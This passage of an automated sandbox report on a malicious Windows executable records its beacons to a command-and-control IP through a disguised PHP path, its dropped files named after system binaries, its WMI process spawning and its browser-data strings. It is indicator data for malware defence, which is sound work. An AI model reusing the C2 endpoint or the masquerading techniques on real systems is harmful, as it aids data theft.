                      Source: global trafficHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.177.108.211
                      Source: unknownHTTP traffic detected: POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 31.177.108.211Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: qmgr.db.44.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000018.00000002.3296971130.00000153AE666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: 84JufgBTrA.exe, 00000000.00000002.1801490254.000000000343C000.00000004.00000800.00020000.00000000.sdmp, 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1928723824.000001DB598B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000016.00000002.1928723824.000001DB59AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E81A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E5E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: powershell.exe, 00000016.00000002.1928723824.000001DB598B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1928598666.0000026E65C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1928426762.000001539E5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1928638377.000001968E3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1910780303.0000019380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: qmgr.db.44.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE56000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: qmgr.db.44.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: qmgr.db.44.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 0000001D.00000002.1910780303.0000019380228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000018.00000002.3296971130.00000153AE666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3186021704.0000019390077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: qmgr.db.44.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 0000002C.00000003.1956030705.0000025C8FE56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: QRuIS2NjsG.38.dr, lAeirWcJ2E.38.dr, vJLV2pkahx.38.dr, 6Dsy5B85n7.38.dr, KlakMpqxk8.38.dr, JG6WL23Kki.38.dr, rc9co3folt.38.dr, 938R1UHVx1.38.dr, usTQWO3oDV.38.dr, fysZJNJ8in.38.dr, cy7p76slxy.38.dr, 2WdYOWgh5d.38.dr, MtoON0W1Bf.38.dr, iTB2ee15IG.38.dr, SbILkwBIAl.38.dr, MmSbScMSiw.38.dr, 51d9kY6yY6.38.dr, fyEjvJDkm8.38.dr, Zaav7KAwRB.38.dr, Jc3IbYoYop.38.dr, cAKdwGtWFy.38.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMPJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMPJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9B871A350_2_00007FFD9B871A35
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9B8713000_2_00007FFD9B871300
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA328D30_2_00007FFD9BA328D3
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA31DFA0_2_00007FFD9BA31DFA
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA30CFD0_2_00007FFD9BA30CFD
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BAC07FA0_2_00007FFD9BAC07FA
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BAC07C80_2_00007FFD9BAC07C8
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BF80B1F0_2_00007FFD9BF80B1F
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B90601A41_2_00007FFD9B90601A
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8B1A3541_2_00007FFD9B8B1A35
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8CC6B541_2_00007FFD9B8CC6B5
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 45_2_00007FFD9B8B1A3545_2_00007FFD9B8B1A35
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 45_2_00007FFD9B8B130045_2_00007FFD9B8B1300
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 46_2_00007FFD9B891A3546_2_00007FFD9B891A35
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 46_2_00007FFD9B89130046_2_00007FFD9B891300
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B891A3548_2_00007FFD9B891A35
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8E601A48_2_00007FFD9B8E601A
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8AC6B548_2_00007FFD9B8AC6B5
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B89FB6948_2_00007FFD9B89FB69
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8AAB7D48_2_00007FFD9B8AAB7D
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 49_2_00007FFD9B8A1A3549_2_00007FFD9B8A1A35
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 49_2_00007FFD9B8A130049_2_00007FFD9B8A1300
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8B1A3550_2_00007FFD9B8B1A35
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8BFB6950_2_00007FFD9B8BFB69
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B90601A50_2_00007FFD9B90601A
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8CC6B550_2_00007FFD9B8CC6B5
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8CAB7D50_2_00007FFD9B8CAB7D
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8F601A52_2_00007FFD9B8F601A
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8BC6B552_2_00007FFD9B8BC6B5
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8A1A3552_2_00007FFD9B8A1A35
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8BAB7D52_2_00007FFD9B8BAB7D
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B8AC6B553_2_00007FFD9B8AC6B5
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B89FB6953_2_00007FFD9B89FB69
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B891A3553_2_00007FFD9B891A35
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B8E601A53_2_00007FFD9B8E601A
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BKcXESYN.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                      Source: rcIHUqTf.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: iyARkwDy.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: aVrcADnQ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: YKVbAlIQ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: IIQWghSC.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: yZwGwFNU.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ordqNcIm.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: 84JufgBTrA.exe, 00000000.00000002.1795623962.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe, 00000000.00000000.1715178285.0000000000DD4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exe, 00000000.00000002.1913805762.000000001C522000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 84JufgBTrA.exe
                      Source: 84JufgBTrA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 84JufgBTrA.exeStatic PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: RuntimeBroker.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe0.0.drStatic PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: MaEiPrsQRasQLtRzJjb.exe1.0.drStatic PE information: Section: .reloc ZLIB complexity 0.99609375
                      Source: rcIHUqTf.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: iyARkwDy.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: aVrcADnQ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: YKVbAlIQ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: IIQWghSC.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: yZwGwFNU.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: ordqNcIm.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@44/334@0/2
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exeJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\84b30d7be2c6da00c99dac410d91ab1630c8ad6ee058ff459919b68628dd5e94
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\AppData\Local\Temp\b5tsyhrwJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                      Source: 84JufgBTrA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 84JufgBTrA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
